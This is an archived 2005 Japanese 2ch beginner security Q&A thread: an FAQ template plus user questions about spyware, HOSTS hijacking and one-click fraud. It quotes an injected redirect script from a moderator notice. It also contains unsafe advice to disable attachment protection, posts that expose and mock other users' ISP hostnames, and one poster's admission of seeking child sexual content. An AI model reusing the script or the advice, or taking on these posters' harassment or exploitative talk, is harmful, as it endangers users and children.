セキュリティ初心者質問スレッドpart56

インターネットとパソコンのセキュリティ関係の初心者質問スレです。

★━ 質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━
　・ OSの種類（必須)、ブラウザ、セキュ関係ソフトの有無、やってみたこと等できる
　　 だけ詳しく報告。（例）「WinXPSP1,IE6SP1使用。ADSL回線でプロバイダは〜
　　 〜のルータを導入しているが、〜ができなくなった」等
　・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
　・ マルチポスト（他スレ、他サイトとの同時質問）禁止。他スレから誘導された場合は、
　　 その旨書くこと。
　・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。
　・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

《参考》
ウィルス情報＆質問　総合スレッド☆Part30
http://pc8.2ch.net/test/read.cgi/sec/1115094416/

・IEが乗っ取られて変になった↓
　　初心者板 http://pc8.2ch.net/pcqa/ に逝って「エロサイト」で検索
　　　関連サイト ttp://www13.plala.or.jp/sukiero/erostart/
・Windowsの動作がおかしい→ http://winfaq.jp/
・なんでもいいからとりあえず検索→Google http://www.google.co.jp/
・ページ内検索→ Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・分類不明の質問→[ここらあたりで探してください] http://pc8.2ch.net/pcqa/
・２ちゃんねるの仕様の質問→ http://etc3.2ch.net/qa/
・2chスレッドタイトル検索→ http://gulab.ruitomo.com/~gulab/k.html

■Internet Explorer：つねに最新バージョンにアップデートしておく。（IE5.5sp2、
　6.0sp1以降推奨）
■安全なブラウザを利用する：
　Opera http://opera.livedoor.com/download/
　　Opera日本語ファイル http://my.opera.com/community/customize/langs/
　Firefox http://www.mozilla.org/products/firefox/
■怪しいメール：開かずに捨てる。IE5.01SP2,IE5.5SP2,IE6.0以上でなく
　Outlook Expressを使用している場合、メールをクリックしただけで感染する場合が
　あるので、プレビュー機能は必ずオフにしておく。
■アンチウィルス：常に最新パターン(ウィルス定義ファイル)に更新してないと意味なし
■不審なURL対策：
URLの文字列をよく見る。sex、loli、search、virusなどの文字列が入っていないか？
鑑定→ラウンジhttp://pc8.2ch.net/test/read.cgi/hack/1103768644/ へ。(初級ネットワーク板）
　その他「勇気」「鑑定」等のキーワードで鑑定スレを検索。
　初心者が誤ってクリックしないよう、ウィルスやブラクラへ直接リンクを張らないこと。
　リンク先を直接見る→「対象をファイルに保存」→メモ帳で一度開いてみる。
■アダルトサイト対策
　インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ
　→ ActiveX、JAVA、スクリプトを全て無効
　ブラウザハイジャッカーの99%はIE以外では作動しない。IEの部品を利用しないOperaや
　Firefoxを利用するとトラブルを防げる。
■最近はウィルス以外にブラウザを乗っ取って個人情報を盗んだり、エロサイトに飛ばし
　 たりするスパイやハイジャッカーが流行している。アンチウィルスソフトだけでは防げ
　 ないのでアンチスパイソフトも入れておく。参考 ttp://www13.plala.or.jp/sukiero/erostart/

【OE(=Outlook Express)】
・OEのプレビューをオフ
　[表示]-[レイアウト]-「プレビューウィンドウを表示する」
　のチェックを外す。

・OE6で添付ファイルが開けない
　「添付ファイルは安全でないため……」と表示される。
　 [ツール]-[オプション]-[セキュリティ]タブ-「ウイルスの
　可能性がある添付ファイルを保存したり開いたりしない」
　のチェックを外す。

・OE以外のメーラーならウィルスメールを開いても安全か？
　IEコンポーネントを利用してHTMLメールを表示する場合はご用心。

　→[おすすめのメールソフトは何？]スレ参照
　http://pc8.2ch.net/test/read.cgi/software/1101659990/


　OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
　http://pc8.2ch.net/test/read.cgi/sec/1021363841/

　IE6SP1適用済みOE6ならHTMLメールをテキスト形式表示可能
　http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
　http://www.ipa.go.jp/security/txt/2002_10.html

【IPアドレス】
・自分のIPアドレスを確認
　9x系：[ファイル名をしてして実行]→winipcfg.exeを実行。
　NT系：コマンドプロント起動→ipconfig /allを実行。

・他人のIPアドレスを確認
　MS-DOSプロンプト(コマンドプロンプト)を起動して、
　netstat -anを実行。表示されたポートから判断。

・IPアドレスから個人情報は漏れるか？
　プロバイダが所有する情報は公権力が無い限り、外部漏洩は
　通常なし。それよりもクラッキング対策をするべき。

・IPアドレスからプロバイダを知りたい
　>>6-10の【Whois】参照。なお、結果を貼りつけても無視される。

【掲示板】
・掲示板荒らし対策
　注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖。
　冷静に判断し、対応。困っているのは貴方だけではない。

・掲示板利用者のIPアドレスは調べられるか？
　HTMLソースに書いてある場合もある。

【各種 Firewall】
ZoneAlarm (本家) http://www.zonelabs.com/ (日本) http://jp.zonelabs.com/
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/kpf_home.html
Tiny Personal Firewall http://www.tinysoftware.com/home/tiny2?la=JP
Agnitum Outpost http://www.agnitum.com/download/outpost1.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://www.atguard.com/
BlackICE Defender http://blackice.jp/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://www.angelfire.com/falcon/icewatch2000/
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer （Tiny Personal Firewall用）
http://server47.hypermart.net/tinyfirewall/ (リンク切れ)

【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.nu/support/download/
Spybot http://security.kolla.de/
【フリー版、体験版、日本語パッチ 等】
ZoneAlarm英語フリー版、Pro http://www.zonelabs.com/store/content/company/products/trial_zaFamily/trial_zaFamily.jsp
フリー版→「ZoneAlarm Free Download」、Pro→「ZoneAlarm Pro」
ZoneAlarm日本語フリー版 http://jp.zonelabs.com/download/znalm.html
ZoneAlarm日本語Pro評価版 http://jp.zonelabs.com/products/zapTrial.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト】
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm (リンク切れ)
Symantec Security Check
http://security.symantec.com/default.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.homelinux.org/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/vinfo/
McAfee ウイルス検索 http://www.nai.com/japan/security/vlibrary.asp

[Windows板] 広告カットとファイヤーウォールソフト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板]
自分のパソコンへの不正侵入対策してますか？2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者＠2ch掲示板 http://pc8.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc8.2ch.net/hack/
windows＠2ch掲示板 http://pc8.2ch.net/win/
ソフトウェア http://pc8.2ch.net/software/
ダウンロードソフト(download板) http://tmp4.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc8.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイトダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.homelinux.org/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ（ネットスケープコミュニケータ）やOpera（オペラ）を使用するという手段があることも念頭にいれてお いてください
http://wp.netscape.com/ja/
http://opera.livedoor.com/

・無料で使えるアンチウイルスソフト
　AVG http://pc5.2ch.net/test/read.cgi/sec/1106661867/
　BitDefender Free Edition http://pc5.2ch.net/test/read.cgi/sec/1103213501/
他AntiVir
・ソフトがなければ、オンラインウィルススキャン
　http://www.symantec.com/region/jp/securitycheck/index.html
　http://www.trendmicro.co.jp/hcall/index.asp
(※署名済みActiveXコントロールのダウンロードを有効にすること)

・ウィルス対策ソフトの用語
　「駆除」：ファイルからウィルスを取り除くこと。
　「隔離、検疫」：ファイルをリネーム、移動。実行できなくする。
　「削除」：ファイル自体を削除。ワーム本体は通常、削除される。
・デマウィルス（安全なファイルをウィルスだと言い張る偽情報）
　jdbgmgr.exe、sage.exeなどは全てWindowsのシステムファイル。
　http://www.ipa.go.jp/security/topics/alert140515.html参照。
・webメール：添付ファイルを実行した場合、感染確率大。
　hotmail：ウィルス検査はあるが、新種のウィルス相手には無力。
・MacはWindowsのウィルスに感染するか？
　WindowsのアプリケーションはMacでは通常は実行できないので、
　感染はしない。但し、保菌してMac→Winへ感染する例がある。
・ファイアーウォールがトロイのアクセスをブロックしたが…
　アウトバウンドで検出：感染の可能性高。
　インバウンドで検出：感染の可能性低。念のためにチェック。
　※たまたまバックドアツールが通常使うポートと同じ場合もある。

他AntiVir
・ソフトがなければ、オンラインウィルススキャン
　http://www.symantec.com/region/jp/securitycheck/index.html
　http://www.trendmicro.co.jp/hcall/index.asp
(※署名済みActiveXコントロールのダウンロードを有効にすること)

・ウィルス対策ソフトの用語
　「駆除」：ファイルからウィルスを取り除くこと。
　「隔離、検疫」：ファイルをリネーム、移動。実行できなくする。
　「削除」：ファイル自体を削除。ワーム本体は通常、削除される。
・デマウィルス（安全なファイルをウィルスだと言い張る偽情報）
　jdbgmgr.exe、sage.exeなどは全てWindowsのシステムファイル。
　http://www.ipa.go.jp/security/topics/alert140515.html参照。
・webメール：添付ファイルを実行した場合、感染確率大。
　hotmail：ウィルス検査はあるが、新種のウィルス相手には無力。
・MacはWindowsのウィルスに感染するか？
　WindowsのアプリケーションはMacでは通常は実行できないので、
　感染はしない。但し、保菌してMac→Winへ感染する例がある。
・ファイアーウォールがトロイのアクセスをブロックしたが…
　アウトバウンドで検出：感染の可能性高。
　インバウンドで検出：感染の可能性低。念のためにチェック。
　※たまたまバックドアツールが通常使うポートと同じ場合もある。

>>1
乙です

>>1乙です

前スレ990
ノートンにmac用のがあったと思う

>>1.>>10乙

多少反則気味ですが質問です。
海外のハッカーサイト、ゲームサイト、エロサイトをよくうろつきますが
セキュリティが大丈夫か気になってます。鑑定していただけませんか？
一応接続環境はＢフレ+ＯＣＮ、ＷｉｎＸＰ SP2、セキュリティソフトは
http://warker.blogzine.jp/deepzone/2005/05/post_efb7.html
こんな感じになっています。
アドバイスください。

>>14
いいんじゃないですか？
あとは万一のために大事な情報やファイルはPC内に残さないとか。

>>14
K撮が踏み込んできたときの対策もしておきましょう。

>>15　>>16
ありがとうごさいます。ちなみに興味半分で覗いている程度なので、犯罪になることはしてないつもりです（藁

あと、海外の特にエロサイトでPOPブロックをかいくぐってくるやつや他のウインドウで開いているIEをジャンプさせたりする
やつがいあるんですが、ＳＰＹＢＯＴのホストロックや内部からのコンパネロックで対応できるんでしょうか？

java, javascript, 画像表示, activex, ページの自動読み込みを全部オフにしとけば
追加のセキュリティソフト無くてもpopup,ブラクラは華麗にスルー出来る。

trojan horse websearch.fというのがAVGで検出され、ちゃんと隔離されたっぽいのに
再起動したら画面青くなって、変なサーチバーが現れました。
そのごspybotでも検索したら出てきたので削除して再起動したんですけど直りません。
trojan horse websearch.fをググッテも出てこなくて、一体何なのか判りません。
本当にトロイでしょうか……orz
ご助言お願いします｡゜（ﾟ´Д｀ﾟ)゜｡ｳｧｧｧﾝ
【OS】　WindowsXPHome
【ブラウザ】　IE6sp2
【セキュリティソフト】AVG
【やった事】AVGで検索→隔離
　　　　　　　　SPYBOTで検索→HITした諸々を削除
　　　　　　　　trojan horse websearch.fをググル、が英語サイトしかかからず
　　　　　　　　必至で英訳してもわかりませんでしたorz
　　　　　　　　シマンテックオンラインスキャンとトレンドマイクロオンラインスキャン
　　　　　　　　で検索してもHITなし

お願いしますorz

再起動後、画面に出てきたメッセージ：
ecurity warning

Afatal error in IE has occured at 0028:C0011E36 in VXD VMM(01) +
00010E36 .Error was caused by Trojan-Spy.HTML.Smitfrand.c

* System can not function in normal mode.
Please check you security settings.
*Scan your PC with any avaliable antivirus/spyware remover
program to fix the problem.

>>19
[アプリケーションの追加と削除] で "Search Toolbar" をアンインストールします。

Search Toolbarが見当たりませんでした･･･orz
【上記からやってみた事】
ネット接続を切ってブラウザノクッキーとキャッシュと一時ファイルを削除。
その後セーフモードで立ち上げてAVGでスキャン→隔離削除
SPYBOTで検索→HITなし

以前変わり無しですorz
(´；ω；`)ｳｯ…

因みに
ttp://ranobe.sakuratan.com/up/updata/up37040.gif
いまのデスクトップです。どなたかどう言うものかご存知の方いらっしゃらないでしょうか(汗

システムの復元切ってから駆除

軽さ重視で、お勧めのアンチウイルスソフトはどれですか？
AVG？V3？そこらへんですよね？

>>22
アダ被の質問サイト見てみろ
似たような質問があった気がするぞ
http://www.higaitaisaku.com/

質問です。
半年くらい前ノートンアンチウィルスを買いました。
ところが、ID番号を誤って捨ててしまい、CDしかありません。
このような場合、インストールしてあるプログラムからID番号を知ることができるのでしょうか？
そして、もしできない場合、シマンテックに連絡すれば、教えてくれるのでしょうか。

お願いします。

>>26
シマンテックに聞け。電話が繋がらないならメール。

質問です。

【OS】Windows　XP　Home
【ブラウザ】？
【セキュリティソフト】 ウィルスバスター2005のお試し版


シマンテックでセキュリティスキャンをしたところ、
対ハッカー重要度チェック、Windows脆弱性チェック、トロイの木馬チェック、の
三項目全てに緑丸の「安全」が出たんですが、
対ハッカー重要度チェックの「詳細を表示」→テスト結果の詳細な分析を表示、とすると
「ICMP　Ping」という一番目の項目が赤丸の「open」の状態になっていました。
この状態って結構危険なのでしょうか。
どのようにすれば安全になるのか教えてください。。

すみません。あげさせてもらいます。

>>28
即危険ではないが、相手に自分の存在は知られる。
ノートンインターネットセキュリティに乗り換える。

>>30
即ではないけど危険なのですか…
うーん、ノートンは２ちゃんが見づらくなったりするようでなんだか
避けていたのですが…

即レスありがとうございました。

すみません、

・WinXP
・IE6SP1
・ウイルスバスター2005インストール済
・電話回線でダイヤルアップ

という感じのPCなのですが、どうやらスパイウェアが入っているようなのです。
いつからかは分からないのですがここの所、
　■PC起動時にネット接続を自動でしようとする。
　■ダイヤルアップの設定が勝手に書き換えられたり、新しい接続を作られたりしている。
　■正常な接続に手動で設定し直して、ネットに繋ぐと、アダルトサイト勝手にを表示してしまう。
　■デスクトップにアダルト関係のショートカットを勝手に作成してしまう。
などの症状が頻発していました。

なので、CWShredderというソフトで、スパイウェアの検索と駆除を試みました。
すると、「CWS．Yexe」というスパイウェアが発見され、駆除済みのメッセージが出たので、一安心して再起動しました。
すると、また同じ症状が出てしまい、おかしいなと思ったので、再度検索した所、
削除されたはずの「CWS．Yexe」がまた発見されてしまいます（復活している？）。
何度削除しても、削除できないので、非常に困っています、何か有効な手段は無いものでしょうか？

>25
ありがとうございます。参考にします！
一先ずがんばってます。

【重要】 第三者による不正アクセスを許す危険性の対策について
http://www.movabletype.jp/archives/2005/05/post_11.html

あのぅ、板違いかもしえませんが・・・
以下のようなソフトをみつけまして、
ttp://www.neuber.com/taskmanager/taskmanager.html
で、どうやら試用期間のあるシェアウェアのようで・・・
このような機能のあるタスクマネージャーの高機能版みたいな
完全にフリーなものってありますか？

>>35
System Safety Monitorに似た感じ…

>>36さん、ありがとうございます
では、さっそくぐぐってきます

>>22
もう手遅れだと思うが、リカバリに全てを託せ

198 名前： みうなぎφ ★ [sage] 投稿日： 2005/05/12(木) 21:26:53 ID:???
〜2chをIE等で見ていると127.0.0.1に飛ばされる件について〜 
　現在2chのほぼ全域(2chトップ・スレ一覧)に埋め込まれているlivedoorのブログ(以下乙部ブログ)に 
　　<script type="text/javascript" language="JavaScript">w=window;if(w.parent != w.self) { w.parent.location = 'http://127.0.0.1/'; }</script><br /> 
　というタグが埋め込まれているため、自動的に127.0.0.1に飛ばされるようになっています。 
　この問題はjavascriptを切る事によって仮解決します 
　また、127.0.0.1に飛ばされた時にハードディスク内のファイルが表示される場合、 
　山田ウィルスに感染している恐れがあるので確認してみてください。 

OSはXPでﾉｰﾄﾝ入れてます ｾｷｭﾘﾃｨ警告についてですが中危険度・認識できないﾌﾟﾛｸﾞﾗﾑがsvchost.exeを使ってｲﾝﾀｰﾈｯﾄにｱｸｾｽしようとしているのを監視が検出しましたやsvchostaが一つ以上の認識されないﾓｼﾞｭｰﾙを使ってｲﾝﾀｰﾈｯﾄにｱｸｾｽしようとしていますと表示されます

svchost以外のもたくさん検出されます頻繁に検出されて作業も出来ません。それが原因なのかｻｰﾊﾞｰにも繋がりません誰か助けてください

http://p14056-adsau13honb6-acca.tokyo.ocn.ne.jp/
うぇｗｗｗ
ｗｗｗ
ｗｗｗｗｗｗｗｗｗｗｗｗっ


ｗｗｗｗｗｗうはっｗｗｗ
おｋｗｗｗｗうはっｗｗｗ
ｗｗｗｗｗｗうぇｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

http://eatkyo419075.adsl.ppp.infoweb.ne.jp/

おｋぷぷぷっうぇぷｗぷぷｗぷぷｗぷｗぷｗぷｗぷぷｗぷぷｗぷｗぷｗ
ｗおｋぷぷぷぷぇぷｗぷっうぇっうぇ
ぷぷぷっうぇｗぷｗみぷぷｗぷｗみぷぷｗぷｗっうぇ

>>40
セーフモードでも作業出来ない？

>>39
情報ｻﾝｸｽ！！

・WinXP sp2
・IE6
・ウイルスバスター2005
・ADSL

ウイルスバスターでセキュリティホールがあるから
アップデートしろと警告されたのですが
windows updateに繋ぐとなぜかフリーズしてしまいます。
そういえば最近さっぱり自動更新が起動していないような気も…。
どなたか解決策など教えて頂けますとありがたいです。

MEからWin-XPにアップグレードし
IE6-SP2
フレッツADSLにルーターで接続
マカフィーを購入してインストールしました。

そうしたらネットに接続できなくなりました。
今はアンインストールしています。
ノートンの体験版をインストールしてみたら２ちゃんだけ見れなくなったので
アンインストールしました。

どうしたら、アンチウィルスソフトを有効にした上で、インターネットを
快適に見られるようになりますか？
MSNのファイアーウォールは無効になっているはずなのですが。

いきなりすみません
stmain.dll
バージョン情報
ファイルバージョン: 1.2.3000.1001
説明: st
著作権: Copyright ? 2004
会社名: Microsoft Corporation
言語: ニュートラル言語
正式ファイル名: st.dll
製品バージョン: 01.02.3000.1001
製品名: st
内部名: st.dll
ってのがあるんですが、このファイルがHijackThis v1.99.1 のエントリにあるんですよ
MSNのフォルダの中にあるんですが、(WinXPの場合c:\Program Files\MSN Apps\ST\01.02.3000.1002\en-xu\)
これってみなさんのOSにもありますか？(ちなみに私はXPです)
もしかして、Microsoft Corporationの名を偽ったAdwareやSpywareでしょうか？

>>46、>>47
FWが原因だと思います。バスターならFW消してみるとか。
マカフィーは使ったことないので、わかりませんがFWの設定を見直すなどしてみてはどうでしょう？

>>48
俺もXPですが、c:\Program Files\MSN Appsというフォルダはありません。
c:\Program Files\MSN\というフォルダはありますが。
解決するかどうかはわかりませんが、Pandaのオンラインスキャンをやってみては？
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm

>>47
マカフィーならば↓を参考にする
http://www.mcafeesecurity.com/Japan/mcafee/faq/ssi_answerCSAllProducts.asp?ancQno=AP-00032&ancProd=AllProducts

ﾉｰﾄﾝ使ってるんですけど警告で侵入しようとしていますの警告がきてからﾉｰﾄﾝの保護者機能を書きかえられましたみたいなかんじで表示されましたｲﾝﾀｰﾈｯﾄもできなくなりましたそのような事ってありますか

山田ってなんですか？

具体的にトラブルになってるのではありませんが質問です。
現在Pen4でHTを使っているのですが、HTを使うのはセキュリティ上まずいのでしょうか？
http://www.theinquirer.net/?article=23215

>>52
>>565

　　　　　　_______　　　　　　　　　　　　　　　　　　　　　_＿
　　　　／／￣~`i ゝ　　　　　　　　　　　　　　　 　 　 `l |
　　　 / /　　　　　　　 ,______　　　,_____　　　　________　 | |　　____　TM
　　　|　|　　 　 ＿__　//￣ヽヽ　//￣ヽヽ　（（￣）） 　 | |　//￣_>>
　　　＼ヽ、　　 ｜l　| |　 　 | |　| |　 　 | |　　``( (.　　.| |　| | ~~
　　　 　 `、二===-'　 ` ===' '　　`===' '　 //￣ヽヽ 　|__ゝ ヽ二=''
　　　　　　　　　　　　　　　　　　　　　　 　 ヽヽ___//　　　日本
　　＿＿＿＿＿　＿＿＿＿＿　 ＿＿＿＿＿_ 　＿_＿＿＿＿＿
　　|　 ウェブ 　|　|　イメージ　|　|　グループ　|　|　ディレクトリ　|
￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　 .＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿
　　　　　　｜山田ウィルス 　　　　 　　　 　　　　　　　│・検索オプション
　　　　　　└────────────────┘・表示設定
　　　　　　　 　| Google検索　|　I'm Feeling Lucky　| 　・言語ツール
　　　　　　　　 ￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣
　　　　　　　○ウェブ全体から検索 ◎日本語のページを検索
　
　
　
　広告掲載について - 人材募集 - Googleについて - Google in English
　￣￣￣￣￣￣￣￣　 ￣￣￣￣　￣￣￣￣￣￣￣　￣￣￣￣￣￣￣
　　　　　　c2004 Google - 4,285,199,774ウェブページから検索

>>54
サンクス。

質問です。トレンドマイクロと検索し、トレンドマイクロのHPに行こうとするとなぜか
「朝日.com」に行き、「お探しの記事は見つかりませんでした。」と出ます。
これはウィルスでしょうか。

>>56
何で検索しました？
アドレスは？

>>56
ttp://www.trendmicro.com/jp/home/enterprise.htm
ここですよ？ここがダメなの？

>>58
やはり駄目でした。新種ですかね？

>>59
IEのオプションでトレンドマイクロを制限サイトにいれてるのでは？

IEオプションの「プライバシー」→「サイト」ですか？
何も登録されていませんが。。

>>59
WORM_MYDOOM.B？

HOSTSファイル改変
　ワームは以下のWEBサイトへアクセスできないようにHOSTSファイルを上書きします。

snortのスレってありませんか？

>>62
ありがとうございました。どうやらHOSTSファイルが上書きされており、
その中にトレンドマイクロもありました。それらを削除、上書き保存すると
アクセスできるようになりました。

パート54の195さんと同じようにネットワークウィルスがここんとこ日に何度も出ます。
知識が無いのでどうすればいいか分かりませんので引用させていただきます。
(とりあえずウィルス名でググッたら下記が引っかかりました)

195 ：名無しさん＠お腹いっぱい。：2005/04/22(金) 18:05:42
いきなりですがどなたか回答をお願いします。
1月前よりMS02-039_SQL_SERVER_RESOLUTION_EXPLOITというネットワークウイルスを
ブロックしましたと、ウイルスバスターが叫んでいます。一日に５回はあるのでちょっと
不安なのですが、このウイルスはどういうウイルスなのでしょうか？
197 ：名無しさん＠お腹いっぱい。：2005/04/22(金) 18:13:19
>195
レジストリがやられてますね手遅れにならない内レジストリ内からウイルスを削除することをお勧めします。
198 ：名無しさん＠お腹いっぱい。：2005/04/22(金) 18:20:36
即レスありがとうございます。早速何とか調べながらやってみます。

という事ですが、どこから手をつけていいものやら・・・
検索のキーワードすら・・・よろしくお願いします。

NIS2005をXPにて使用していますが最近スパイウェアなるものが
気になってきました。
NISにもスパイウェア検出機能があるらしいのですが
専門の物よりも機能が劣る　という話を聞きました。

なのでスパイウェア削除ソフトを入れようかと思うのですが
NISと一緒に入れていても大丈夫なものなのでしょうか？
NIS側の注意書きに「他のセキュリティーソフトと使用するな！」とありまして
気になり、実行出来ずにここでお聞きしようと思った次第です

>>66
スパイウェアに関しては 【アダルトサイト被害対策の部屋】 ttp://www.higaitaisaku.com/
が詳しい。そこへ行って研究汁。

>>67
逆に言うとほとんどの感染ルートがアダルトサイトなんですかね？

アダルトサイトには行ってないので、そのタイトルのとこに行くのすら気が引けますｗ

HTTの脆弱性について教えてください。BSD系統のOSでのみ
問題があるのですか？

そんなことはない

↑>>68

すいません。メールで１２歳とか書いてあったもんで、
ついアドレスをクリックしてしまったんですけど、
中に入ったとたん、ば〜っとプログラムがたくさん出てきて、個人情報を取得しました、とか書かれてます。

お金払わないとやばいでしょうか？

ここの板で聞いていいですか？

下のアドレス、トップページは平気なんですけど、写真クリックするとやられました。
完全炉利で５回くらい入ってみたけど、全部やられました。写真はトップだけなんとか保存しました。

詳しい人、ウイルスとか入ってしまっているのか、調べてもらえませんか？教えてください。

ttp://www.keevo.net/iji/?2893fb7e4afaae660f7354988b760ae2c97327312b7f

>>72
悪質ﾜﾝｸﾘｻｲﾄの口座情報等を晒し通報するスレ◆2
http://pc7.2ch.net/test/read.cgi/antispam/1115594722/

>>72
ワンクリック登録詐欺サイト質問スレ　その18
http://pc7.2ch.net/test/read.cgi/antispam/1114437389/

移動しますね！！

全然レスがつかないです。
緊急なんで困ってます。

ウイルスあるページのことを逆にどんなウイルスかとか調べてくれる
逆強力ハッカーのようなスレはありませんか？

絶対感染してます。困ってます。
ホットメールもこんな糞サイトメール送らないでほしいです。

あぼーん

払わないと違反になるんですか？
誰か教えてくださいよ！！ヽ(`Д´)ﾉｳﾜｧｧｧﾝ

勝手に人のパソコンいじった方も犯罪にならないんですか？

>>78
ワンクリック登録詐欺
~~~~~~~~~~~~~~~~~~~~~

72 名前：名無しさん＠お腹いっぱい。[] 投稿日：2005/05/14(土) 11:25:41
　　　↓
75 名前：名無しさん＠お腹いっぱい。[] 投稿日：2005/05/14(土) 11:32:31
移動しますね！！
　　　↓
76 名前：７２[] 投稿日：2005/05/14(土) 11:44:25
全然レスがつかないです。


おまい　気 短いなｗ
焦るのもわからんでもないけど、もうちょっと気長に待てよ。
で、払わんでもいいよ。

一応、自分のこと

年収０円、借金３１０万円（親払い）
友達、７年くらい１人も会ってない

こんな俺に、請求とか来られてもマジで困るんですけど・・・。

>>79
でも、「個人情報完全に抜き取りました」と出ていて

パソコンのデータとかで、自分の住所や名前や口座を取られてる可能性

あるんですけど、大丈夫ですか？

さぎ 【詐欺】

(1)巧みにいつわって金品をだまし取ったり、相手に損害を与えたりすること。
あざむくこと。ペテン。
「―にひっかかる」「―を働く」「―師」
(2)〔法〕 他人をあざむいて錯誤に陥らせる行為。民法上、詐欺による意思表示は
取り消すことができ、また、詐欺による損害は詐欺者の不法行為として賠償させる
ことができる。

何故かというと、
メールアドレス登録してないのに、アドレスもIE直接入力で行ったのに、
俺のメールに届いてるんですよ！確認メールが！！
俺のパソコン全部乗っ取られて、ファイルとか取られてるんですかね？やばいですかね？
メールアドレス載せてないし、書いてないんですよ？でも、届いてるんですよ？マジですよ。

このサイト、内容見る限り、さらに借金してでも入ってみたいと思うくらいの
内容なのに、何でこんな危ないことやってるのか不可思議です。

実は表はダミーで目的は別にあるんですかね？個人情報抜くことですかね？
人のパソコンをハッキングするなんて、糞サイトですね。

「ご利用料金は定額 60,000円です。ご入会日より90日間ご利用可能です。
18歳以上で利用規約に同意・入会の方はOKボタンを押して下さい。」に同意したんだろ。
自己責任。
つーか炉利史ね。

> すいません。メールで１２歳とか書いてあったもんで、
> ついアドレスをクリックしてしまったんですけど、
> 中に入ったとたん、ば〜っとプログラムがたくさん出てきて、個人情報を取得しました、とか書かれてます。

>>84
お前が自らさらしたttp://www.keevo.net/iji/?2893fb7e4afaae660f7354988b760ae2c97327312b7f
にお前のメールアドレスが符号化されて入っている。
俺も、そのアドレスで登録しといてやったよ。(藁

マジですか？

>>87
ということは、あなたもわたしのメールアドレスがわかるんですか？
とりあえず、友達になってもいいので、僕にメール送ってみてください。

>>84
> すいません。メールで１２歳とか書いてあったもんで

このメールがどうして届いたか考えろ

>>87

ちょっとその前に疑問。

ウイルスやられて、プログラム書き換えられませんでした？
何故、平気なんですか？

俺のパソコンヒイヒイいってやられましたよ。

>>89
入ってみたら本当に１２歳くらいの本物でしたよ。

>>88
gin????ginだろ、特別割引で39000円だってよ。(藁

この短時間で３０回も登録すんなよ。メール変えなければいけないな。

http://www.keevo.net/iji/member/?2cb19fd3031edde485223fee742c712e4246e7e85fa1

悪質ワンクリで書いたこのアドレスの場合、どんなメールになるんだ？
どこで解析してんだ？ページ開設してる本人か？

16進数あたりか？
おまえ、相当怪しいぞ。

使用OSはXPでセキュリティーソフトをノートン使ってるのですが
XPについてるセキュリティー（windowsファイアウォール）は
切っておいていいのでしょうか？

>>94
登録すればデコードされて表示される。(藁

>>56
いまさらかもしれないけど。
トレンドマイクロ行こうとして朝日.comに飛ばされるってのは、山田ウイルスの症状のような…。

avastを入れたらスレに専ブラ、IEどちらでも
｢公開プロキシから投稿は受け付けてません｣と出て書き込めません、
プロキシ設定をしなおせば大丈夫でしょうか？
しかしその設定がわからないので教えてください。

ウイルスセキュリティ2005EXの糞さに疲れて、
ZoneAlarm＋Spybotにしました。
そんでたまにシマンテックとウィルスバスターの
オンラインスキャンでもすればいいかなと思っていますが、
いかがでしょうか？
やっぱZoneAlarmのメール保護だけじゃやばいっすかね？

OS:98se
ブラウザ:IE&FireFox
回線:ADSL（ルーターあり）

シマンテックの無料ウイルススキャンをしたところ、

警告! スキャンがコンピュータのメモリ上でアクティブなウィルスを検出しました。
さらに感染するのを防ぐためにスキャンを終了しました。
すぐにコンピュータをシャットダウンし、ウイルス対策の救済ディスクまたは同様のツールを使って再起動してください。
メモリ上でウィルスは見つかりませんでした。
コンピュータは何らかの既知のウイルスまたはトロイの木馬に感染しています。
シマンテック・セキュリティ・レスポンス サイト上で以下にあげられたウイルスの名前を削除情報として検索します。
c:\2ch用ブラウザ\Log\2ch\ascii\1102347165.dat は　VBS.LoveLetter.Var に感染しています。
c:\2ch用ブラウザ\Log\2ch\liventv\1109335554.dat は　Unix.Penguin に感染しています。

